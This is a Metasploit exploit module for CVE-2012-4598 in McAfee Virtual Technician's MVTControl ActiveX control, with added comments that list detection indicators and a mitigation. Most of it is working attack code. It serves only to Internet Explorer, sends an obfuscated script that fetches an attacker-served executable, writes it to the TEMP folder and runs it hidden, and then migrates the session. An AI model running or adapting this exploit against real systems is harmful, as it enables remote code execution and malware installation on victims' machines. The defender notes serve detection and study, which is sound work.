##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-delivered Metasploit module for CVE-2012-4598: the MVTControl ActiveX
# control shipped with McAfee Virtual Technician exposes GetObject(), which the
# page served below uses to obtain WScript.Shell and ADODB.Stream objects.
# Code then runs with the rights of the browsing user ('Privileged' => false).
#
# Defender notes, all derived from the code in this class:
# * Only requests whose User-Agent matches /MSIE \d/ are served; other clients
#   get a 404, so a scanner with a non-IE User-Agent sees nothing.
# * The served script is passed through JSObfu before sending, so literal-text
#   signatures on the JavaScript are unlikely to match on the wire.
# * Host-side behaviour is more stable: script instantiation of ProgID
#   "MVT.MVTControl.6300" (CLSID 2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF per the
#   comment in on_request_uri), a second GET to the same URL plus
#   "/<5-10 letters>.exe" answered as application/octet-stream, that file
#   written under the process TEMP directory, then launched via WScript.Shell.
# * The vendor advisory is listed in 'References' (SB10028). Where the fix
#   cannot be applied, a kill bit for the CLSID is the usual ActiveX
#   mitigation; confirm against the advisory.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# HttpServer::HTML makes the module act as a web server (on_request_uri is the
# per-request callback); EXE supplies generate_payload_exe used below.
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
# Registers the module's metadata (name, description, references, payload
# constraints, defaults, target list) with the framework via update_info.
def initialize(info={})
super(update_info(info,
'Name' => "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in McAfee Virtual Technician's
MVTControl. This ActiveX control can be abused by using the GetObject() function
to load additional unsafe classes such as WScript.Shell, therefore allowing remote
code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', #Initial discovery, Poc
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2012-4598' ],
[ 'OSVDB', '81657'],
[ 'EDB', '18805' ],
[ 'URL', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10028' ]
],
# Payload encoding must avoid NUL bytes.
'Payload' =>
{
'BadChars' => "\x00",
},
# InitialAutoRunScript names a post module run when a session opens.
# NOTE(review): judging by its name it migrates the session to another
# process, so the initial browser child process may be short-lived (confirm).
'DefaultOptions' =>
{
'EXITFUNC' => "none",
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => '2012-04-30',
'DefaultTarget' => 0))
end
# Picks the executable's file name once per run, then hands control to the
# parent class. rand(6) + 5 yields a length of 5..10, so the name is
# "<5-10 characters>.exe" (rand_text_alpha presumably returns letters only).
# Because the name changes per run, a fixed file name is not a usable
# indicator; match on the pattern or on behaviour instead.
def exploit
@payload_name = rand_text_alpha(rand(6) + 5) + ".exe"
super
end
# Per-request handler. Three outcomes, checked in this order:
#   1. User-Agent does not match /MSIE \d/ -> log an error and answer 404.
#   2. Request URI ends in ".exe"          -> build and send the executable.
#   3. Anything else                       -> send the HTML page with the script.
# cli is the client connection passed through to the send_* helpers;
# request supplies the headers and the URI.
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
# A missing User-Agent (nil) also takes this branch: nil !~ regex is true.
if agent !~ /MSIE \d/
print_error("Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
# Second-stage fetch issued by the served script (see the XMLHTTP call below).
# If regenerate_payload returns nil, nothing is sent for this request.
if request.uri =~ /\.exe$/
return if ((p=regenerate_payload(cli))==nil)
data = generate_payload_exe({:code=>p.encoded})
print_status("Sending payload")
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
return
end
# <object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj'></object>
# Script sent to the browser. It instantiates the control by ProgID, asks
# GetObject() for WScript.Shell and ADODB.Stream, downloads
# <page URL>/<@payload_name> with a synchronous XMLHTTP GET, saves the body to
# <TEMP>\<@payload_name> and starts it with window style 0 (hidden).
# "\\\\" in this interpolating heredoc reaches the browser as "\\", i.e. one
# backslash inside the JavaScript string.
js = <<-JS
var obj = new ActiveXObject("MVT.MVTControl.6300");
var ws = obj.GetObject("WScript.Shell");
var ado = obj.GetObject("ADODB.Stream");
var e = ws.Environment("Process");
var url = document.location + "/#{@payload_name}";
var tmp = e.Item("TEMP") + "\\\\#{@payload_name}";
var xml = new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET", url, false);
xml.send(null);
res = xml.responseBody;
ado.Type = 1;
ado.Mode = 3;
ado.Open();
ado.Write(res);
ado.SaveToFile(tmp);
ws.Run(tmp, 0);
JS
# The script is obfuscated before it is embedded, so what goes over the wire
# differs from the literal text above.
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
# Minimal page wrapping the (obfuscated) script in a deferred <script> tag.
html = <<-EOS
<html>
<head>
</head>
<body>
<script defer=defer>
#{js}
</script>
</body>
</html>
EOS
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end